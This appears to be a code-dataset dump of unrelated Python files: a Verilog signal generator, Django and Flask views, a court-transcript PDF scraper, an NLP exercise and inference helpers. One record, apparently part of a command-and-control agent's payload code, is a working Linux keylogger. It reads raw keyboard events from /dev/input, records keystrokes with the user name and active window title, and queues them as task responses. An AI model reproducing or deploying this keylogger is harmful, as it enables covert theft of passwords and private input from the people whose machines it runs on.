basic_type\n self.hier = hier\n self.direction = direction\n\n def visit_Int(self, type_, field, **kwds):\n return [\n f'{self.basic_type} signed [{type_.width-1}:0] {self.context}; // {type_}'\n ]\n\n def visit_Bool(self, type_, field, **kwds):\n return [f'{self.basic_type} [0:0] {self.context}; // {type_}']\n\n def visit_Uint(self, type_, field, **kwds):\n if type_.width != 0:\n return [\n f'{self.basic_type} [{type_.width-1}:0] {self.context}; // {type_}'\n ]\n\n return None\n\n visit_Ufixp = visit_Uint\n visit_Fixp = visit_Int\n\n def visit_Unit(self, type_, field, **kwds):\n return None\n\n def visit_Union(self, type_, field, **kwds):\n res = []\n\n # top\n res.append(\n f'{self.basic_type} [{type_.width-1}:0] {self.context}; // {type_}')\n\n res.extend(\n self._complex_type_iterator([('data', type_.data),\n ('ctrl', type_.ctrl)]))\n\n return res\n\n def visit_Queue(self, type_, field, **kwds):\n res = []\n\n # top\n res.append(\n f'{self.basic_type} [{type_.width-1}:0] {self.context}; // {type_}')\n\n res.extend(\n self._complex_type_iterator([('data', type_.data),\n ('eot', type_.eot)]))\n return res\n\n def _complex_type_iterator(self, subt_enum):\n if not self.hier:\n return []\n\n res = []\n parent_context = self.context\n pos_low = 0\n for name, subt in subt_enum:\n self.context = f'{parent_context}_{name}'\n sub_wire = self.visit(subt, None)\n if sub_wire:\n res.extend(sub_wire)\n pos_high = pos_low + subt.width - 1\n if self.direction == 'input':\n res.append(\n f'assign {self.context} = {parent_context}[{pos_high}:{pos_low}];'\n )\n else:\n res.append(\n f'assign {parent_context}[{pos_high}:{pos_low}] = {self.context};'\n )\n\n pos_low = pos_high + 1\n\n self.context = parent_context\n return res\n\n def visit_Tuple(self, type_, field, **kwds):\n res = []\n res.append(\n f'{self.basic_type} [{type_.width-1}:0] {self.context}; // {type_}')\n\n res.extend(self._complex_type_iterator(zip(type_.fields, type_.args)))\n\n return res\n\n def visit_Array(self, type_, field, **kwds):\n if getattr(type_.data, 'signed', False):\n merge_t = Int[type_.data.width * len(type_)]\n else:\n merge_t = Uint[type_.data.width * len(type_)]\n\n arr_var = f'{self.context}_arr'\n res = self.visit(merge_t, type_.fields[0])\n res.append(\n f'{self.basic_type} [{type_.data.width-1}:0] {arr_var} [0:{len(type_).width-1}];')\n\n high = 0\n low = 0\n for i in range(len(type_)):\n high += type_.data.width\n\n if self.direction == 'input':\n res.append(f'assign {arr_var}[{i}] = {self.context}[{high - 1}:{low}];')\n else:\n res.append(f'assign {self.context}[{high - 1}:{low}] = {arr_var}[{i}];')\n\n low += type_.data.width\n\n return res\n\n\ndef vgen_intf(dtype, name, direction, hier=True):\n valid = f'reg {name}_valid;\\n'\n ready = f'reg {name}_ready;'\n\n if isinstance(dtype, str):\n data = f'{dtype} {name}_data;\\n'\n return data + valid + ready\n\n if dtype.width == 0:\n data = f'wire [0:0] {name}_data;\\n'\n return data + valid + ready\n\n vis = VGenTypeVisitor(name,\n direction=direction,\n basic_type='wire',\n hier=hier)\n data = '\\n'.join(vis.visit(type_=dtype, field=name)) + '\\n'\n return data + valid + ready\n\n\ndef vgen_signal(dtype, vtype, name, direction, hier=True):\n if isinstance(dtype, str):\n return f'{dtype} {name};'\n\n if is_type(dtype) and dtype.width == 0:\n return f'{vtype} [0:0] {name};'\n\n if not hier:\n if is_type(dtype):\n width = dtype.width\n sign = 'signed' if getattr(dtype, 'signed', False) else ''\n elif isinstance(dtype, (tuple, list)):\n width = sum(d.width for d in 
dtype)\n sign = ''\n\n return f'{vtype} {sign} [{width-1}:0] {name}; // {dtype}'\n\n vis = VGenTypeVisitor(name,\n basic_type=vtype,\n direction=direction,\n hier=hier)\n\n return '\\n'.join(vis.visit(type_=dtype, field=name))\n","sub_path":"pygears/hdl/sv/v/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":5008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"591352302","text":"from django.contrib.auth.models import User\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.forms import UserCreationForm, AuthenticationForm\nfrom django.shortcuts import (render, redirect, get_object_or_404)\nfrom django.template import loader\nfrom django.contrib.auth.decorators import login_required\nfrom Patient.models import Profile\nfrom Patient.forms import ProfileForm\nfrom Researcher.views import *\n\n# Create your views here.\n\nfrom django.http import HttpResponse\n\ndef index(request):\n\t# if (request.user.is_athenticated()):\n\t\t# return HttpResponse(\"logged in\")\n\treturn redirect(\"/login\")\n\n\n@login_required\ndef logout_user(request):\n\tlogout(request)\n\t# return HttpResponse(\"asdf\")\n\treturn redirect('../login')\n\n# def newAccount(request):\n\t# if (request.method == 'POST'):\n\ndef about(request):\n template = loader.get_template('./about.html')\n return HttpResponse(template.render({},request))\n\n\ndef researcher_login(request):\n\ttemplate = loader.get_template('./researcher_login.html')\n\terrorMsg=''\n\tform = AuthenticationForm()\n\n\tif request.method == 'POST':\n\t\tform = AuthenticationForm(data=request.POST)\n\t\tif form.is_valid():\n\t\t\tuser = User.objects.get(username = request.POST['username'])\n\t\t\tprofile = Profile.objects.get(user_id=user)\n\t\t\tif profile.isResearcher:\n\t\t\t\tuser = authenticate(username=request.POST['username'],password=request.POST['password'])\n\t\t\t\tif user is not None:\n\t\t\t\t\treturn redirect('/researcher_home')\n\t\t\t\telse:\n\t\t\t\t\terrorMsg = 'Error - please double check your password/username!'\n\t\t\telse:\n\t\t\t\terrorMsg=errorMsg+\"Sorry, you must be a researcher. 
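One thing to note in `researcher_login` above: `authenticate()` is called, but Django's `login(request, user)` is never invoked before the redirect, so no session is established even though `login` is imported. A hedged sketch of the usual flow (assumes a standard Django project; this is the conventional idiom, not the record's exact code):

```python
from django.contrib.auth import authenticate, login
from django.shortcuts import redirect

def sign_in(request):
    # Hypothetical view body: authenticate, then bind the user to the session.
    user = authenticate(request, username=request.POST["username"],
                        password=request.POST["password"])
    if user is not None:
        login(request, user)  # establishes the session cookie
        return redirect("/researcher_home")
    return redirect("/login")
```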
\"\n\t\telse:\n\t\t\terrorMsg = errorMsg + 'validation error'\n\treturn HttpResponse(template.render({'errorMsg':errorMsg,'form':form},request))\n\ndef new_account(request):\n\terrorMsg = \"\"\n\tif request.method == 'POST':\n\t\t# username = request.POST['username']\n\t\t# password = request.POST['password']\n\t\tuForm = UserCreationForm(request.POST)\n\t\tpForm = ProfileForm(request.POST)\n\t\tif pForm.is_valid() and uForm.is_valid():\n\t\t\tuser = uForm.save() #User.objects.create_user(username=username,password=password)\n\t\t\t# user.save()\n\t\t\t# if (reques)\n\t\t\tprofile = Profile.objects.create(user=user,isResearcher=(request.POST['isResearcher']=='on'),healthcardNumber=pForm.cleaned_data['healthcardNumber'])\n\t\t\tprofile.save()\n\t\t\tresearcher_home(request)\n\t\t\t# return redirect('/login')\n\t\telse:\n\t\t\treturn HttpResponse(\"pForm not validated\")\n\t\t\terrorMsg = \"Form validation error\"\n\tuserForm = UserCreationForm()\n\tprofileForm = ProfileForm()\n\ttemplate = loader.get_template('./new_account.html')\n\tcontext = {'userForm':userForm,'profileForm':profileForm, 'errorMsg':errorMsg, 'errLen':(len(errorMsg))}\n\treturn HttpResponse(template.render(context,request))\n","sub_path":"CapacityDiagnostic/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"320917015","text":"from django.conf.urls import url, include\nfrom django.contrib import admin\nfrom .views import HomePage, AboutPage\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^accounts/', include('registration.backends.hmac.urls')),\n url(r'^$', HomePage.as_view(), name='home'),\n url(r'^about/', AboutPage.as_view(), name='about'),\n url(r'^profile/', include('user_profile.urls')),\n url(r'^recipe/', include('recipe.urls')),\n url(r'^recipebook/', include('recipebook.urls')),\n url(r'^review/', include('review.urls')),\n url(r'^notifications/', include('notification.urls')),\n url(r'^list/', include('shoppinglist.urls')),\n]\n","sub_path":"recipes/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"544365424","text":"def keylog_no_X(task_id):\n\n global responses \n\n\n def get_active_window_title():\n root = subprocess.Popen(['xprop', '-root', '_NET_ACTIVE_WINDOW'], stdout=subprocess.PIPE)\n stdout, stderr = root.communicate()\n\n m = re.search(b'^_NET_ACTIVE_WINDOW.* ([\\w]+)$', stdout)\n if m != None:\n window_id = m.group(1)\n window = subprocess.Popen(['xprop', '-id', window_id, 'WM_NAME'], stdout=subprocess.PIPE)\n stdout, stderr = window.communicate()\n else:\n return \"None\"\n\n match = re.match(b\"WM_NAME\\(\\w+\\) = (?P.+)$\", stdout)\n if match != None:\n return match.group(\"name\").strip(b'\"').decode()\n\n return \"None\"\n\n def find_event():\n\n f = open(\"/proc/bus/input/devices\")\n lines = str(f.readlines())\n\n while lines.find(\"I:\") != -1:\n #Read block by block\n event = \"\"\n start = lines.find(\"I:\")\n end = lines.find(\"B: EV=\")+12\n\n if lines[start:end].find(\"B: EV=12001\") != -1:\n event_start = lines[start:end].find(\"event\")\n event_start += start \n\n i = 1\n try:\n while True:\n int(lines[event_start + 5 : event_start + 5 + i])\n event = lines[event_start: event_start + 5 + i]\n i += 1\n except:\n return event\n\n lines = lines[end-6:]\n\n\n\n qwerty_map = {\n 2: \"1\", 3: \"2\", 4: \"3\", 5: \"4\", 6: \"5\", 
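`get_active_window_title` above shells out to `xprop` and regex-matches its bytes output; the record's second pattern shows `(?P.+)`, which looks like an extraction artifact of `(?P<name>.+)` given the later `match.group("name")` call. The parsing step can be exercised without X by feeding captured samples (the sample strings below are illustrative, not output from any real session):

```python
import re

root_out = b"_NET_ACTIVE_WINDOW(WINDOW): window id # 0x3a00007"
m = re.search(rb"^_NET_ACTIVE_WINDOW.* ([\w]+)$", root_out)
assert m and m.group(1) == b"0x3a00007"

name_out = b'WM_NAME(STRING) = "terminal"'
m = re.match(rb"WM_NAME\(\w+\) = (?P<name>.+)$", name_out)
assert m and m.group("name").strip(b'"').decode() == "terminal"
```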
7: \"6\", 8: \"7\", 9: \"8\", 10: \"9\",\n 11: \"0\", 12: \"-\", 13: \"=\", 14: \"[BACKSPACE]\", 15: \"[TAB]\", 16: \"a\", 17: \"z\",\n 18: \"e\", 19: \"r\", 20: \"t\", 21: \"y\", 22: \"u\", 23: \"i\", 24: \"o\", 25: \"p\", 26: \"^\",\n 27: \"$\", 28: \"\\n\", 29: \"[CTRL]\", 30: \"q\", 31: \"s\", 32: \"d\", 33: \"f\", 34: \"g\",\n 35: \"h\", 36: \"j\", 37: \"k\", 38: \"l\", 39: \"m\", 40: \"ù\", 41: \"*\", 42: \"[SHIFT]\",\n 43: \"<\", 44: \"w\", 45: \"x\", 46: \"c\", 47: \"v\", 48: \"b\", 49: \"n\", 50: \",\",\n 51: \";\", 52: \":\", 53: \"!\", 54: \"[SHIFT]\", 55: \"FN\", 56: \"ALT\", 57: \" \", 58: \"[CAPSLOCK]\",\n }\n\n\n print(find_event())\n infile_path = \"/dev/input/\" + find_event().strip()\n\n FORMAT = 'llHHI'\n EVENT_SIZE = struct.calcsize(FORMAT)\n\n in_file = open(infile_path, \"rb\")\n\n event = in_file.read(EVENT_SIZE)\n\n line = \"\"\n\n while event:\n\n if break_function:\n print(\"break detected, stopping keylog\")\n response = {\n \"task_id\": task_id,\n \"user\": getpass.getuser(), \n \"window_title\": get_active_window_title(), \n \"keystrokes\": line,\n \"completed\": True\n }\n responses.append(response)\n break_function = False\n return\n\n (_, _, type, code, value) = struct.unpack(FORMAT, event)\n\n if code != 0 and type == 1 and value == 1:\n\n if code == 28 or code == 96:\n response = {\n \"task_id\": task_id,\n \"user\": getpass.getuser(), \n \"window_title\": get_active_window_title(), \n \"keystrokes\": line + \"\\n\",\n }\n responses.append(response)\n line = \"\"\n else: \n line += qwerty_map[code]\n\n event = in_file.read(EVENT_SIZE)","sub_path":"Payload_Types/kayn/agent_code/keylog_no_X.py","file_name":"keylog_no_X.py","file_ext":"py","file_size_in_byte":3393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"116570571","text":"#!/usr/bin/env python#\n# -*- coding: utf-8 -*-\n \nfrom dependency_parsing import DependencyParsing\n\ndef main():\n dp = DependencyParsing(\"neko.xml\")\n s = dp.sentences[4]\n print(s)\n for c in s.chunks:\n verb = False\n for m in c.morphs:\n if m.pos == '動詞':\n verb = True\n print(m.base + '\\t', end='')\n break\n list = []\n if verb:\n for nc in c.srcs:\n for m in s.chunks[nc].morphs:\n if m.pos == '助詞':\n list.append(s.chunks[nc])\n print(m.surface, end=' ')\n print('\\t', end='')\n for c in list:\n print(c, end=' ')\n print()\n \nif __name__ == '__main__':\n main()\n","sub_path":"46.py","file_name":"46.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"450967132","text":"from robots.state import saveContent\n\n\ndef user():\n\n def askAndReturnSearchTerm():\n return str(input('Type a Wikipedia search term: ')).title()\n\n def redLine(lista, text):\n for i in range(len(lista)):\n print('[', i, ']', lista[i])\n return int(input(text))\n\n def askAndReturnPrefix(language):\n if(language == 'en'):\n prefixes = ['Who is', 'What is', 'The history of']\n else:\n prefixes = ['Quem é', 'Oque é', 'A história de']\n prefix = redLine(prefixes, 'Choose a option: ')\n return prefixes[prefix]\n\n def askAndReturnTemplate():\n prefixes = ['Know the world ', 'Senta que la vem historia - newsroom',\n 'Senta que la vem historia - music epic',\n 'Senta que la vem historia - music evolution',\n 'Senta que la vem historia - music Missing My Girl']\n prefix = redLine(prefixes, 'Choose a Template option: ')\n return prefix+1\n\n def askAndReturnLanguage():\n prefixes = ['English', 'Portuguese']\n 
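The keylogger loop above decodes fixed-size Linux `input_event` structs with format `'llHHI'` (two longs of timestamp, then type, code, value). Note a bug: `break_function` is read at the top of the loop but only ever assigned inside the function body, which makes it a local name and raises `UnboundLocalError` on the first iteration. The struct decoding itself can be verified on synthetic bytes:

```python
import struct

FORMAT = "llHHI"
EVENT_SIZE = struct.calcsize(FORMAT)

# A fabricated key-press: type 1 (EV_KEY), code 30 ('q' in the record's AZERTY map), value 1
event = struct.pack(FORMAT, 0, 0, 1, 30, 1)
assert len(event) == EVENT_SIZE
_, _, etype, code, value = struct.unpack(FORMAT, event)
assert (etype, code, value) == (1, 30, 1)
```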
language = ['en', 'pt']\n prefix = redLine(prefixes, 'Choose a Language option: ')\n return language[prefix]\n\n language = askAndReturnLanguage()\n\n content = {\n # 'language': 'en',\n 'language': language,\n 'searchTerm': askAndReturnSearchTerm(),\n # 'prefix': 'What is ',\n 'prefix': askAndReturnPrefix(language),\n 'maximumSentences': 7,\n 'template': 1\n # 'template': askAndReturnTemplate()\n }\n saveContent(content)\n","sub_path":"robots/userInput.py","file_name":"userInput.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"134568122","text":"import bs4 as bs\nimport urllib.request \nimport requests\nimport re\nimport os\nfrom urllib.parse import urljoin\n\ndef get_pdfs():\n\turl_get = 'https://www.supremecourt.gov/oral_arguments/argument_transcript/2008'\n\tsauce = urllib.request.urlopen(str(url_get)).read()\n\tsoup = bs.BeautifulSoup(sauce, 'lxml')\n\n\tpdf_link = soup.find_all('span', style='display:block;width:80px;float:left;')\n\tpdf_urljoins = []\n\tfor link in pdf_link:\n\t \tpdf_urljoin = re.findall(r'\\bargument_transcripts[/]\\d{4}[/]\\d{0,10}\\W\\w*[.]\\bpdf', str(link))\n\t \tpdf_urljoins.append(pdf_urljoin)\n\tprint(len(pdf_urljoins))\n\t\n\tpdf_names = []\n\tfor link in pdf_link:\n\t \tpdf_name = re.findall(r'\\d{1,2}[-]\\d{1,10}[.]\\bpdf', str(link))\n\t \tpdf_names.append(pdf_name)\n\n\t# flattens pdf_urljoins list \n\tflat_pdf_urljoins = [item for url in pdf_urljoins for item in url]\n\n\t# flattens pdf_names list \n\tflat_pdf_names = [item for url in pdf_names for item in url]\n\t\n\t# provides the base for the URLs in urljoin\n\tbase = re.findall(r'\\bhttps://www[.]\\bsupremecourt[.]\\bgov/oral_arguments/', url_get)\n\t\n\tlinks = []\n\tfor url in flat_pdf_urljoins:\n\t\tx = urljoin(str(base[0]), str(url))\n\t\tlinks.append(x)\n\n\tcounter = 0\n\tfor link in links:\n\t\tr = requests.get(link, allow_redirects=False)\n\t\topen(str(link[70:]), 'wb').write(r.content)\n\t\tcounter += 1\n\t\tprint(counter, link)\n\t\nget_pdfs()","sub_path":"Capstone 2/PDF Parsing Scripts/pdf_downloader_1.py","file_name":"pdf_downloader_1.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"519877591","text":"#!/usr/bin/python3\n\"\"\"\nRoutes:\n /states: HTML page with a list of all State objects.\n /states/: HTML page displaying the given state with .\n\"\"\"\nfrom models import storage\nfrom flask import Flask\nfrom flask import render_template\n\napp = Flask(__name__)\n\n\n@app.route(\"/states\", strict_slashes=False)\ndef states():\n \"\"\"\n Displays a HTML page with a list of all states\n \"\"\"\n states = storage.all(\"State\")\n return render_template(\"9-states.html\", state=states)\n\n\n@app.route(\"/states/\", strict_slashes=False)\ndef states_by_id(id):\n \"\"\"\n Displays a HTML page with state that matches id if exists\n \"\"\"\n for state in storage.all(\"State\").values():\n if state.id == id:\n return render_template(\"9-states.html\", state=state)\n return render_template(\"9-states.html\")\n\n\n@app.teardown_appcontext\ndef teardown(exc):\n \"\"\"\n Remove current SQLAlchemy session\n \"\"\"\n storage.close()\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\")\n","sub_path":"web_flask/9-states.py","file_name":"9-states.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} 
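The PDF downloader above regex-extracts a base URL and joins relative `argument_transcripts/...` paths onto it with `urljoin`. Its trailing-slash behaviour is the part worth pinning down; a quick sketch (the filename is illustrative, in the shape the record's pattern matches):

```python
from urllib.parse import urljoin

base = "https://www.supremecourt.gov/oral_arguments/"
rel = "argument_transcripts/2008/07-1015.pdf"
assert urljoin(base, rel) == (
    "https://www.supremecourt.gov/oral_arguments/argument_transcripts/2008/07-1015.pdf"
)
# Without the trailing slash the last path segment is replaced instead.
assert urljoin("https://example.com/a/b", "c") == "https://example.com/a/c"
```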
+{"seq_id":"498534330","text":"# -*- coding: utf-8 -*-\nfrom django.contrib import messages\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom django.db.models import Q\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse_lazy\nfrom django.views import View\nfrom django.views.generic import ListView, UpdateView, CreateView\nfrom django.views.generic.detail import SingleObjectMixin\n\nfrom Nomencladores.forms import CarreraForm\nfrom Nomencladores.models import Carrera\n\n\nclass ListadoCarreras(ListView):\n model = Carrera\n template_name = 'Carreras/listado_carreras.html'\n paginate_by = 10\n\n def get_queryset(self):\n carreras = Carrera.objects.all().order_by('nombre')\n\n q = self.request.GET.get('q')\n if q is not None:\n carreras = carreras.filter(Q(nombre__icontains=q) |\n Q(tipo__icontains=q)\n )\n return carreras\n\n def get_context_data(self, **kwargs):\n context = super(ListadoCarreras, self).get_context_data(**kwargs)\n context['titulo'] = 'Carreras'\n context['subtitulo'] = 'listado'\n context['path'] = [\n {'name': 'Nomencladores'},\n {'name': 'Carreras', 'href': reverse_lazy('listado_carreras')}\n\n ]\n\n resultado = \"\"\n if self.get_queryset().count() == 0:\n resultado = \"No existen elementos para desplegar.\"\n context['resultado'] = resultado\n\n return context\n\n\nclass RegistrarCarreraView(SuccessMessageMixin, CreateView):\n model = Carrera\n template_name = \"Carreras/carrera_form.html\"\n form_class = CarreraForm\n success_url = reverse_lazy('listado_carreras')\n\n def get_context_data(self, **kwargs):\n context = super(RegistrarCarreraView, self).get_context_data(**kwargs)\n context['titulo'] = \"Registrar\"\n context['subtitulo'] = \"carrera\"\n context['form'] = self.form_class\n context['path'] = [\n {'name': 'Nomencladores'},\n {'name': 'Carreras', 'href': reverse_lazy('listado_carreras')},\n {'name': 'Registrar carrera', 'href': reverse_lazy('registrar_carrera')}\n ]\n return context\n\n def form_valid(self, form):\n form.save()\n messages.add_message(self.request, messages.SUCCESS, \"Carrera agregada con éxito.\")\n return super(RegistrarCarreraView, self).form_valid(form)\n\n def form_invalid(self, form):\n context = {\n 'titulo': \"Registrar\",\n 'subtitulo': \"candidato\",\n 'form': form,\n 'path': [\n {'name': 'Bolsa', 'href': reverse_lazy('listado_bolsa')},\n {'name': 'Registrar', 'href': reverse_lazy('registrar_candidato')}\n ]\n }\n return render(self.request, self.template_name, context)\n\n\nclass ModificarCarreraView(UpdateView):\n model = Carrera\n template_name = \"Carreras/carrera_form.html\"\n form_class = CarreraForm\n success_url = reverse_lazy('listado_carreras')\n\n def get_context_data(self, **kwargs):\n context = super(ModificarCarreraView, self).get_context_data(**kwargs)\n obj = Carrera.objects.get(pk=self.kwargs['pk'])\n context['titulo'] = \"Modificar\"\n context['subtitulo'] = \"carrera\"\n context['path'] = [\n {'name': 'Nomencladores'},\n {'name': 'Carreras', 'href': reverse_lazy('listado_carreras')},\n {'name': 'Modificar', 'href': reverse_lazy('modificar_carrera', kwargs={'pk': obj.pk})},\n ]\n return context\n\n def form_valid(self, form):\n form.save()\n messages.add_message(self.request, messages.SUCCESS, \"Carrera modificada con éxito.\")\n return super(ModificarCarreraView, self).form_valid(form)\n\n\nclass EliminarCarreraView(SingleObjectMixin, View):\n\n def get(self, request, *args, **kwargs):\n carrera = Carrera.objects.get(id=self.kwargs['pk'])\n carrera.delete()\n 
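`ListadoCarreras.get_queryset` above narrows the queryset with OR-combined `Q` objects when a `q` parameter is present (the Spanish identifiers and messages: "Carrera" is a degree program, "agregada/modificada con éxito" means added/modified successfully). A hedged sketch of the same idiom lifted out of the view (assumes a Django model with `nombre` and `tipo` fields, as in the record):

```python
from django.db.models import Q

def search_carreras(queryset, q=None):
    # OR together two case-insensitive substring matches; no-op when q is absent.
    if q:
        queryset = queryset.filter(Q(nombre__icontains=q) | Q(tipo__icontains=q))
    return queryset.order_by("nombre")
```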
messages.add_message(request, messages.SUCCESS, \"Eliminada con éxito.\")\n return redirect('/carreras/')\n\n\nclass ActivarCarreraView(SingleObjectMixin, View):\n\n def get(self, request, *args, **kwargs):\n carrera = Carrera.objects.get(id=self.kwargs['pk'])\n carrera.activo = True\n carrera.save()\n messages.add_message(request, messages.SUCCESS, \"Habilitada con éxito.\")\n return redirect('/carreras/')\n\n\nclass DesactivarCarreraView(SingleObjectMixin, View):\n\n def get(self, request, *args, **kwargs):\n carrera = Carrera.objects.get(id=self.kwargs['pk'])\n carrera.activo = False\n carrera.save()\n messages.add_message(request, messages.SUCCESS, \"Deshabilitada con éxito.\")\n return redirect('/carreras/')\n","sub_path":"Nomencladores/views/views_carreras.py","file_name":"views_carreras.py","file_ext":"py","file_size_in_byte":4763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"633370674","text":"from bs4 import BeautifulSoup\nimport requests\nimport regex\nimport unicodedata\nimport sys\n\nimport urllib\n\ndef __main__():\n year = sys.argv[1];\n semester = sys.argv[2];\n\n schedulePull = semester + str(year) + \"/schedule.html\"\n\n data = requests.get(\"https://courses.k-state.edu/\" + schedulePull)\n\n scheduleURLS = data.text\n\n soup = BeautifulSoup(scheduleURLS, \"html.parser\")\n\n urlList = []\n for link in soup.find_all('a'):\n if( len(str(link.get(\"href\"))) < 7 and (str(link.get(\"href\")) != \"/\" and str(link.get(\"href\")) != \"None\") ):\n urlList.append(str(link.get(\"href\")))\n print(\"https://courses.ksu.edu/\" + semester + str(year) + \"/\" + str(link.get(\"href\")))\n sys.stdout.flush()\n\t\t\t\n__main__()","sub_path":"Windows/get_urls.py","file_name":"get_urls.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"94442644","text":"import sys\r\n\r\nimport numpy\r\nfrom numpy import log10\r\nfrom numpy import logaddexp\r\nfrom numpy import log\r\nfrom scipy.special import logsumexp as logsum1\r\nnumpy.seterr(all='ignore')\r\n\r\n\r\ndef logsumexp(a):\r\n \"\"\"\r\n Uses the log sum exp technique to do computation in higher domain than float\r\n @param a: The array for which we want to find the sum\r\n @return: The sum of the array founded by log sum exp technique\r\n \"\"\"\r\n #return logsum1(a)/log(10)\r\n mx = max(a)\r\n to_return = log10(numpy.sum([threshold(10 ** (i - mx)) for i in a])) + mx\r\n return to_return\r\n\r\n\r\ndef threshold(x):\r\n \"\"\"\r\n This function is used to find the value in the given limit\r\n @param x: The value which needs to be checked\r\n @return: the value according to the threshold\r\n \"\"\"\r\n if x == float('inf'):\r\n return sys.float_info.max\r\n return x\r\n\r\n\r\ndef get_index_given_truth_values(variables, truth_values, cardinalities):\r\n \"\"\"\r\n The function converts truth table tuples to array indices\r\n :param variables: The variable in factor\r\n :param truth_values: The values of given variables in the truth table (same order as variable)\r\n :param cardinalities: The cardinality of the given variables (same order as variable)\r\n :return:The index for the array\r\n \"\"\"\r\n index = 0\r\n number = 0\r\n while number < len(variables):\r\n number_of_tuples_for_current_var = numpy.prod(cardinalities[number + 1:]) * truth_values[number]\r\n index = index + number_of_tuples_for_current_var\r\n number += 1\r\n return int(index)\r\n\r\n\r\ndef 
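`helper.logsumexp` above implements the log-sum-exp trick in base 10: subtract the max before exponentiating so no term overflows, sum, take log10, and add the max back. A standalone check against the naive computation:

```python
import numpy as np

def logsumexp10(a):
    # log10(sum(10**x for x in a)) computed without overflow.
    m = max(a)
    return m + np.log10(sum(10.0 ** (x - m) for x in a))

small = [0.1, 0.5, 0.9]
assert np.isclose(logsumexp10(small), np.log10(sum(10.0 ** x for x in small)))
# Magnitudes this large overflow the naive form but not the stable one.
assert np.isclose(logsumexp10([1000.0, 1000.0]), 1000.0 + np.log10(2.0))
```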
get_truth_values_given_index(variables, index_value, cardinalities):\r\n \"\"\"\r\n Gives the truth value (values in tuple) for given index of the array\r\n @param variables: list containing all the variables in the graph which are in the factor\r\n @param index_value: Index value for which the tuple is to be founded\r\n @param cardinalities: Cardinalities of the given variables\r\n @return: the tuple for corresponding index value\r\n \"\"\"\r\n number = 0\r\n truth_table_value = []\r\n while number < len(variables):\r\n truth_table_value.append(int(index_value // numpy.prod(cardinalities[number + 1:])))\r\n index_value = index_value - (index_value // numpy.prod(cardinalities[number + 1:])) * numpy.prod(\r\n cardinalities[number + 1:])\r\n number += 1\r\n return truth_table_value\r\n\r\n\r\ndef convert_to_log_space(distribution_array):\r\n \"\"\"\r\n This function is used to convert the given array into log space\r\n @param distribution_array: Given distribution array\r\n @return: The distribution array in log space\r\n \"\"\"\r\n new_distribution_array = []\r\n for each in distribution_array:\r\n new_distribution_array.append(list(numpy.log10(each)))\r\n return new_distribution_array\r\n\r\n\r\ndef convert_to_exponent_space(distribution_array):\r\n \"\"\"\r\n This function is used to convert the given array into exponent space\r\n @param distribution_array: Given distribution array\r\n @return: The distribution array in exponent space\r\n \"\"\"\r\n new_distribution_array = []\r\n for each in distribution_array:\r\n if each is not list:\r\n each_new = threshold(10 ** each)\r\n else:\r\n each_new = []\r\n for each_value in each:\r\n each_new.append(threshold(10 ** each))\r\n new_distribution_array.append(each_new)\r\n return new_distribution_array\r\n\r\n\r\ndef compute_ordering(num_of_var, var_in_clique, evidence):\r\n \"\"\"\r\n\r\n @param num_of_var: Number of variable for which the ordering is needed\r\n @param var_in_clique: the number of variables in each clique\r\n @param evidence: The evidence provided\r\n @return: variables according to their degree for elimination\r\n \"\"\"\r\n min_degree_for_each_var = [0] * num_of_var\r\n evidence_var = [x[0] for x in evidence]\r\n for each in var_in_clique:\r\n each_without_evidence = each\r\n for each_var in each_without_evidence:\r\n min_degree_for_each_var[each_var] += len(each_without_evidence) - 1\r\n sorted_variable = numpy.argsort(min_degree_for_each_var)\r\n each = 0\r\n \"\"\"\r\n while each < (len(sorted_variable)):\r\n if sorted_variable[each] in evidence_var:\r\n sorted_variable = numpy.delete(sorted_variable, each)\r\n min_degree_for_each_var.remove(min_degree_for_each_var[each])\r\n each = each - 1\r\n each = each + 1\r\n \"\"\"\r\n return min_degree_for_each_var, sorted_variable\r\n\r\n\r\ndef instantiate(num_of_var, evidence, cardinalities, var_in_clique, distribution_array):\r\n \"\"\"\r\n Used to instantiate the factors given the evidence\r\n @param num_of_var: The number of variables in the graph\r\n @param evidence: The given evidence\r\n @param cardinalities: THe cardinalities of the variables\r\n @param var_in_clique: Variables in the clique\r\n @param distribution_array: The probability distribution array\r\n @return: The instantiated probability distribution table and updated variable list\r\n \"\"\"\r\n for each in evidence:\r\n variable = each[0]\r\n value = each[1]\r\n var_in_clique = numpy.array(var_in_clique)\r\n cardinalities = numpy.array(cardinalities)\r\n for each_clique in range(len(var_in_clique)):\r\n if 
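`get_index_given_truth_values` and `get_truth_values_given_index` above are a mixed-radix encode/decode pair: each variable's digit is weighted by the product of the cardinalities to its right. The roundtrip property is easy to verify:

```python
import numpy as np

def encode(values, cards):
    return int(sum(v * np.prod(cards[i + 1:]) for i, v in enumerate(values)))

def decode(index, cards):
    out = []
    for i in range(len(cards)):
        stride = int(np.prod(cards[i + 1:]))  # prod of an empty slice is 1
        out.append(index // stride)
        index %= stride
    return out

cards = [2, 3, 2]
for idx in range(int(np.prod(cards))):
    assert encode(decode(idx, cards), cards) == idx
```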
